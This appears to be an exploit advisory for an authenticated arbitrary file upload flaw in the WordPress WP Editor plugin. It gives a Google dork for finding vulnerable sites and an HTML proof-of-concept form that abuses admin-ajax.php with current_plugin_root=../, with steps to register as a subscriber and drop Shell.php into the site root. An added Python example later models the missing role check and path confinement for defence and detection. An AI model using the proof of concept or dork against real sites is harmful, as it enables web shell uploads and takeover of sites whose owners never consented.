<!--
\ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
\ \ / /| | '__| | | / __|\ /| | | |_ /
\ V / | | | | |_| \__ \/ \| |_| |/ /
\_/ |_|_| \__,_|___/_/\_\____//___|
-->
#########################################################
# Exploit Title: WordPress WP Editor Authenticated Arbitrary File Upload Vulnerability
# Category: webapps
# Software Link: https://wordpress.org/plugins/wp-editor/
# Version affected: 1.2.5.x
# Google Dork: inurl:/wp-content/plugins/wp-editor/
########################################################
-------------------------------------------------------------------------------
# [-] Proof of Concept
<html>
<head>
</head>
<body>
<form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="action" value="upload_files" />
<input type="hidden" name="current_plugin_root" value="../" />
<input type="hidden" name="directory" value="" />
<input type="file" name="file-0" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
#
# Log in to WordPress as a subscriber-level or higher user.
#
# To add a subscriber user:
# /wp-login.php?action=register
#
# Upload the chosen file using the proof-of-concept form above.
# The uploaded file will be placed in the root directory of the WordPress installation:
# http://www.Target.com/Shell.php
-------------------------------------------------------------------------------
Solution:
Update to the latest version.
Video
https://youtu.be/wShvHCecPtg
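The following is an added example written for this page, not WP Editor's own PHP, and it is in Python rather than PHP purely as an illustration. It models the two server-side controls whose absence the proof of concept relies on: a capability check, since a subscriber-level account can reach the upload_files action, and confinement of the computed destination under the plugin directory, since current_plugin_root=../ walks out of it. The PLUGINS_ROOT path, the role names and the sample requests are constructed; only the field values in the "poc" entry come from the form above.

```python
# Added illustration (not WP Editor's own code): the two server-side checks a
# file-manager style upload handler needs. Paths and request values below are
# constructed samples; only the "poc" entry mirrors the advisory's form fields.
import os

# Assumption: only administrators may write into the plugin tree.
ALLOWED_ROLES = {"administrator"}

# Constructed sample install path; it need not exist for the checks to run.
PLUGINS_ROOT = "/srv/wp/wp-content/plugins"


class UploadRejected(Exception):
    """Raised when an upload request fails authorization or path confinement."""


def authorize(role):
    """Capability check: the PoC works because a subscriber may call the endpoint."""
    if role not in ALLOWED_ROLES:
        raise UploadRejected(f"role {role!r} may not upload plugin files")


def resolve_upload_target(plugins_root, current_plugin_root, directory, filename):
    """Return the absolute destination, or raise if it leaves plugins_root.

    current_plugin_root and directory are the caller-controlled form fields
    from the PoC; filename is the name of the uploaded file.
    """
    # The file name must be a single path component, never "../x.php".
    if not filename or filename in (".", "..") or os.path.basename(filename) != filename:
        raise UploadRejected(f"invalid filename {filename!r}")
    root = os.path.realpath(plugins_root)
    # Resolve ".." segments and symlinks before comparing against the root.
    # os.path.join also lets an absolute "directory" replace the root, which
    # the confinement check below then catches.
    candidate = os.path.realpath(os.path.join(root, current_plugin_root, directory, filename))
    # commonpath, not startswith: "/x/plugins-evil" would pass a prefix test.
    if os.path.commonpath([root, candidate]) != root:
        raise UploadRejected(f"destination {candidate!r} escapes {root!r}")
    return candidate


def handle_upload(request, plugins_root=PLUGINS_ROOT):
    """Apply both checks in the order the endpoint should: who, then where."""
    authorize(request["role"])
    return resolve_upload_target(
        plugins_root, request["current_plugin_root"], request["directory"], request["filename"]
    )


def evaluate(requests):
    """Return {label: 'accepted: <path>' or 'rejected: <reason>'} per request."""
    results = {}
    for label, req in requests.items():
        try:
            results[label] = "accepted: " + handle_upload(req)
        except UploadRejected as exc:
            results[label] = "rejected: " + str(exc)
    return results


# Constructed requests; "poc" carries the exact field values from the form above.
SAMPLE_REQUESTS = {
    "poc": {"role": "subscriber", "current_plugin_root": "../", "directory": "", "filename": "Shell.php"},
    "poc_as_admin": {"role": "administrator", "current_plugin_root": "../", "directory": "", "filename": "Shell.php"},
    "absolute_dir": {"role": "administrator", "current_plugin_root": "wp-editor", "directory": "/etc", "filename": "x.php"},
    "sibling_prefix": {"role": "administrator", "current_plugin_root": "../plugins-evil", "directory": "", "filename": "x.php"},
    "nested_filename": {"role": "administrator", "current_plugin_root": "wp-editor", "directory": "", "filename": "../x.php"},
    "legit": {"role": "administrator", "current_plugin_root": "wp-editor", "directory": "css", "filename": "style.css"},
}

if __name__ == "__main__":
    for label, outcome in evaluate(SAMPLE_REQUESTS).items():
        print(f"{label:16} {outcome}")
```

Running the block prints one decision per sample: the PoC request is refused on role alone, the same field values from an administrator are refused because the resolved path leaves the plugin directory, and only the request that stays under wp-editor/ is accepted. The order matters for detection as well as defence: a handler that rejects on role first never reaches the filesystem, so a stream of upload_files requests from low-privilege accounts is a clean signal to alert on.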